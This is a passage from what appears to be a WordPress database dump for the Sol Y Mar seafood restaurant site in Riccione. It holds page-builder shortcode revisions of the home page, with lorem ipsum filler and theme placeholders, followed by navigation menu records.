css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]</p>\r\n','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2020-12-06 18:36:05','2020-12-06 17:36:05','',3040,'https://www.ristorantesolymar.it/2020/12/06/3040-revision-v1/',0,'revision','',0),(3394,1,'2020-12-06 18:39:02','2020-12-06 17:39:02','<p>[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.</p>\r\n<p>Mauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.<br />\r\nCucina di Pesce, proposte vegetariane<br />\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]</p>\r\n<div dir=\"auto\">e proposte vegetariane</div>\r\n<p>[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday<br />\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday<br />\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]</p>\r\n<h3>Ristorante Sol Y Mar</h3>\r\n<p>[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio<br />\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`<br />\r\n{<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#f5f5f5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.icon``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``visibility``: ``off``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#616161``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.text.stroke``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#f5f5f5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``administrative.land_parcel``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#bdbdbd``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#eeeeee``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#757575``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi.park``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#e5e5e5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi.park``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#ffffff``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.arterial``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#757575``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.highway``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#dadada``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.highway``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#616161``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.local``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``transit.line``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#e5e5e5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``transit.station``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#eeeeee``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``water``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#c9c9c9``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``water``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n}<br />\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]</p>\r\n','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2020-12-06 18:39:02','2020-12-06 17:39:02','',3040,'https://www.ristorantesolymar.it/2020/12/06/3040-revision-v1/',0,'revision','',0),(3395,1,'2020-12-06 18:47:41','2020-12-06 17:47:41','','Home','','publish','closed','closed','','home-5','','','2020-12-06 18:47:41','2020-12-06 17:47:41','',0,'https://www.ristorantesolymar.it/2020/12/06/home-5/',1,'nav_menu_item','',0),(3396,1,'2020-12-06 18:47:41','2020-12-06 17:47:41','','Pages','','publish','closed','closed','','pages-5','','','2020-12-06 18:47:41','2020-12-06 17:47:41','',0,'https://www.ristorantesolymar.it/2020/12/06/pages-5/',11,'nav_menu_item','',0),(3397,1,'2020-12-06 18:47:41','2020-12-06 17:47:41','','Blog','','publish','closed','closed','','blog-5','','','2020-12-06 18:47:41','2020-12-06 17:47:41','',0,'https://www.ristorantesolymar.it/2020/12/06/blog-5/',22,'nav_menu_item','',0),(3398,1,'2020-12-06 18:47:41','2020-12-06 17:47:41','','Shop','','publish','closed','closed','','shop-5','','','2020-12-06 18:47:41','2020-12-06 17:47:41','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-5/',33,'nav_menu_item','',0),(3399,1,'2020-12-06 18:47:41','2020-12-06 17:47:41','','Portfolio','','publish','closed','closed','','portfolio-5','','','2020-12-06 18:47:41','2020-12-06 17:47:41','',0,'https://www.ristorantesolymar.it/2020/12/06/portfolio-5/',45,'nav_menu_item','',0),(3400,1,'2020-12-06 18:47:41','2020-12-06 17:47:41','','Elements','','publish','closed','closed','','elements-3','','','2020-12-06 18:47:41','2020-12-06 17:47:41','',0,'https://www.ristorantesolymar.it/2020/12/06/elements-3/',68,'nav_menu_item','',0),(3401,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Home','','publish','closed','closed','','home-6','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/home-6/',1,'nav_menu_item','',0),(3402,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Pages','','publish','closed','closed','','pages-6','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/pages-6/',11,'nav_menu_item','',0),(3403,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Portfolio','','publish','closed','closed','','portfolio-6','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/portfolio-6/',22,'nav_menu_item','',0),(3404,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop','','publish','closed','closed','','shop-6','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-6/',1,'nav_menu_item','',0),(3405,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Blog','','publish','closed','closed','','blog-6','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/blog-6/',13,'nav_menu_item','',0),(3406,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Elements','','publish','closed','closed','','elements-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/elements-4/',24,'nav_menu_item','',0),(3407,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Home','','publish','closed','closed','','home-7','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/home-7/',1,'nav_menu_item','',0),(3408,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Pages','','publish','closed','closed','','pages-7','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/pages-7/',6,'nav_menu_item','',0),(3409,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop','','publish','closed','closed','','shop-7','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-7/',19,'nav_menu_item','',0),(3410,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Portfolio','','publish','closed','closed','','portfolio-7','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/portfolio-7/',11,'nav_menu_item','',0),(3411,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Blog','','publish','closed','closed','','blog-7','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/blog-7/',15,'nav_menu_item','',0),(3412,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Home','','publish','closed','closed','','home-8','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/home-8/',1,'nav_menu_item','',0),(3413,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Pages','','publish','closed','closed','','pages-8','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/pages-8/',6,'nav_menu_item','',0),(3414,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop','','publish','closed','closed','','shop-8','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-8/',15,'nav_menu_item','',0),(3415,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Blog','','publish','closed','closed','','blog-8','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/blog-8/',11,'nav_menu_item','',0),(3416,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Product Single','','publish','closed','closed','','product-single-5','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/product-single-5/',35,'nav_menu_item','',0),(3417,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop Layouts','','publish','closed','closed','','shop-layouts-3','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-layouts-3/',36,'nav_menu_item','',0),(3418,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop Pages','','publish','closed','closed','','shop-pages-3','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-pages-3/',40,'nav_menu_item','',0),(3419,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Product Single','','publish','closed','closed','','product-single-6','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/product-single-6/',3,'nav_menu_item','',0),(3420,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop Layouts','','publish','closed','closed','','shop-layouts-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-layouts-4/',4,'nav_menu_item','',0),(3421,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Shop Pages','','publish','closed','closed','','shop-pages-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/shop-pages-4/',8,'nav_menu_item','',0),(3422,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Product Single','','publish','closed','closed','','product-single-7','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/product-single-7/',21,'nav_menu_item','',0),(3423,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Product Single','','publish','closed','closed','','product-single-8','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/product-single-8/',17,'nav_menu_item','',0),(3424,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Classic','','publish','closed','closed','','classic-3','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/classic-3/',69,'nav_menu_item','',0),(3425,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Presentation','','publish','closed','closed','','presentation-3','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/presentation-3/',78,'nav_menu_item','',0),(3426,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Infographic','','publish','closed','closed','','infographic-3','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/infographic-3/',86,'nav_menu_item','',0),(3427,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Typography','','publish','closed','closed','','typography-3','','','2020-12-06 18:47:42','2020-12-06 